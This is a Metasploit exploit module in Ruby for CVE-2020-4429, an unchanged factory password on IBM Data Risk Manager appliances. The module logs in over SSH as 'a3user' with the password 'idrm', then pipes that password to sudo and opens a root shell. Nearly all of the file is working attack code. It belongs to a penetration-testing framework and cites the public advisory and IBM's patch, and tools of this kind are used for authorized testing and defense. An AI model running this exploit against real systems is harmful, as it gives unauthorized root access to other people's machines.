GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/ssh/ibm_drm_a3user.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
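class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SSH

  # Registers module metadata, the single target and the datastore options
  # consumed by #do_login and #on_new_session.
  #
  # USERNAME / PASSWORD default to the factory credentials described in the
  # module's references (CVE-2020-4429). SSH_DEBUG and SSH_TIMEOUT are
  # advanced options read in #do_login.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'IBM Data Risk Manager a3user Default Password',
        'Description' => %q{
          This module abuses a known default password in IBM Data Risk Manager. The 'a3user'
          has the default password 'idrm' and allows an attacker to log in to the virtual appliance
          via SSH. This can be escalate to full root access, as 'a3user' has sudo access with the default password.
          At the time of disclosure this was an 0day, but it was later confirmed and patched by IBM.
          Versions <= 2.0.6.1 are confirmed to be vulnerable.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
        ],
        'References' => [
          [ 'CVE', '2020-4429' ], # insecure default password
          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2020/Apr/33' ],
          [ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/'],
          [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
        ],
        'Payload' => {
          'Compat' => {
            'PayloadType' => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [
          [ 'IBM Data Risk Manager <= 2.0.6.1', {} ]
        ],
        'Privileged' => true,
        'DefaultTarget' => 0,
        'DisclosureDate' => '2020-04-21',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(22),
        OptString.new('USERNAME', [true, 'Username to login with', 'a3user']),
        OptString.new('PASSWORD', [true, 'Password to login with', 'idrm'])
      ]
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  # Session callback: once the SSH session is established, feeds the same
  # PASSWORD to sudo over stdin (-S) and then starts a root shell inside
  # the session.
  #
  # Review notes, both visible in the command string below:
  # - PASSWORD is interpolated unquoted into the remote command line, so a
  #   value containing shell metacharacters would break the command.
  # - The success message is printed unconditionally; nothing checks
  #   whether the sudo calls actually succeeded.
  # NOTE(review): the `echo ... | sudo -S` pattern leaves the sudo
  # invocations visible to the appliance's sudo/auth logging — confirm
  # against the appliance's logging configuration.
  #
  # @param client [Object] the new session; must respond to #shell_command_token
  def on_new_session(client)
    print_status("#{peer} - Escalating privileges to root, please wait a few seconds...")
    # easiest way I found to get passwordless root, not sure if there's a shorter command
    client.shell_command_token("echo #{datastore['PASSWORD']} | sudo -S 'echo 2>/dev/null'; sudo /bin/sh")
    print_good("#{peer} - Done, enjoy your root shell!")
  end

  # @return [String] target host taken from the datastore
  def rhost
    datastore['RHOST']
  end

  # @return [Integer] target port taken from the datastore (registered default 22)
  def rport
    datastore['RPORT']
  end

  # @return [String] "host:port" prefix used in all status output
  def peer
    "#{rhost}:#{rport}"
  end

  # Opens an SSH session to rhost:rport using password / keyboard-interactive
  # authentication, bounded by SSH_TIMEOUT seconds.
  #
  # Each error class is mapped to the specific Msf failure reason it
  # represents (unreachable, disconnected, timeout, no access) instead of
  # reporting every failure as Failure::Unknown, so fail_with output and
  # module statistics reflect why the attempt stopped. The generic
  # Net::SSH::Exception rescue is kept last because it is the most general
  # net-ssh error class.
  #
  # @param user [String] SSH username
  # @param pass [String] SSH password
  # @return [Net::SSH::CommandStream, nil] a command stream wrapping the
  #   session, or nil if Net::SSH.start returned nothing
  # @raise via fail_with on connection, disconnect, timeout or auth errors
  def do_login(user, pass)
    opts = ssh_client_defaults.merge({
      auth_methods: ['password', 'keyboard-interactive'],
      port: rport,
      password: pass
    })

    # Extreme verbosity; only when the operator asked for it.
    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

    begin
      ssh = ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        Net::SSH.start(rhost, user, opts)
      end
    rescue Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} SSH - Connection error")
    rescue Net::SSH::Disconnect, ::EOFError
      fail_with(Failure::Disconnected, "#{peer} SSH - Disconnected during negotiation")
    rescue ::Timeout::Error
      fail_with(Failure::TimeoutExpired, "#{peer} SSH - Timed out during negotiation")
    rescue Net::SSH::AuthenticationFailed
      fail_with(Failure::NoAccess, "#{peer} SSH - Failed authentication")
    rescue Net::SSH::Exception => e
      fail_with(Failure::Unknown, "#{peer} SSH Error: #{e.class} : #{e.message}")
    end

    return Net::SSH::CommandStream.new(ssh, logger: self) if ssh

    nil
  end

  # Module entry point: logs in with USERNAME / PASSWORD and hands the
  # resulting command stream's socket to the payload handler, which in turn
  # triggers #on_new_session.
  def exploit
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']

    print_status("#{peer} - Attempting to log in to the IBM Data Risk Manager appliance...")
    conn = do_login(user, pass)
    return unless conn

    print_good("#{peer} - Login successful (#{user}:#{pass})")
    handler(conn.lsock)
  end
end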